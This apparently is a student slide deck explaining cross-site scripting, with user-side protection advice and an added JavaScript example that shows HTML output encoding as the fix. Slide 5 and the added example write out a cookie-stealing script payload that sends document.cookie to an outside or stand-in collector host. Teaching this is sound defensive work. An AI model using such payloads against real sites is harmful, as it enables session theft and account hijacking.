Cross Site Scripting Information Systems Security LAÏMOUCHE El Hadj, DAVY Benjamin 1 source : http://www.cgisecurity.com/articles/xss-faq.shtml

Post on 26-Dec-2015


Page 1

Cross Site Scripting

Information Systems Security

LAÏMOUCHE El Hadj, DAVY Benjamin

source : http://www.cgisecurity.com/articles/xss-faq.shtml

Page 2

What is Cross Site Scripting?

Users' data is gathered through a website.

Malicious code is hidden in links, message-board posts or e-mails.

The code is often encoded (e.g. in hex) to look less suspicious.

Page 3

What do XSS and CSS mean?

People often refer to Cross Site Scripting as CSS.

CSS is also used for Cascading Style Sheets.

When you see XSS, you can be sure it refers to the security threat.

Page 4

What are the threats of Cross Site Scripting?

Injection of JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user.

Account hijacking, changing user settings, cookie theft and false advertising are all possible.

Page 5

How to: XSS cookie theft

Target a website using cookies.

Test how it works and where it is possible to insert code (e.g. a form that allows HTML).

JavaScript code: http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'%20+document.cookie</script>

Page 6

How to protect myself?

Only follow links from the main website.

Be careful: XSS can execute automatically when you open an e-mail, read a guestbook, etc.

Turn off JavaScript.

Encryption does not protect against XSS.
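The slides only give user-side advice; the server-side fix is output encoding. The following is an added example, not part of the original slides or of the cgisecurity FAQ: it renders the `variable` parameter from slide 5 into an input attribute, first unescaped (which lets the `"><script>` value close the attribute and inject a tag) and then HTML-entity-encoded. The breakout value is constructed from the slide-5 payload with the collector URL replaced by a placeholder; `renderVulnerable`, `renderHardened` and `countTags` are names chosen here.

```javascript
// Added example (not from the slides). Node.js, no dependencies.

// Vulnerable rendering: the query parameter is placed straight into a
// double-quoted attribute, so a value starting with "> closes the attribute
// and the tag, and everything after it is parsed as markup.
function renderVulnerable(variable) {
  return `<input type="text" name="variable" value="${variable}">`;
}

// HTML-entity-encode the five characters that change meaning in HTML text
// or inside a double-quoted attribute value. This is the right encoding for
// those two contexts only; values placed inside a <script> block, a URL or
// an unquoted attribute need a different, context-specific encoding.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened rendering: same template, encoded on output.
function renderHardened(variable) {
  return `<input type="text" name="variable" value="${escapeHtml(variable)}">`;
}

// Count opening tags in the rendered HTML. The page author wrote exactly one
// (<input>), so any second tag came from the user-controlled value.
function countTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

// Constructed input: the slide-5 value of ?variable= after URL decoding, with
// the cookie-collector host replaced by a placeholder.
const breakout =
  `"><script>document.location='http://collector.example/?'+document.cookie</script>`;

console.log(renderVulnerable(breakout)); // two tags: <input> and an injected <script>
console.log(renderHardened(breakout));   // one tag: the <input>, payload shown as text
```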

Page 7

How common are XSS holes?

Websites from FBI.gov, CNN.com, Time.com, eBay, Yahoo, Apple Computer, Microsoft, ZDNet, Wired and Newsbytes have all had one form or another of XSS bug.

10-25 XSS holes are found every month.

Page 8

It's over

Any questions?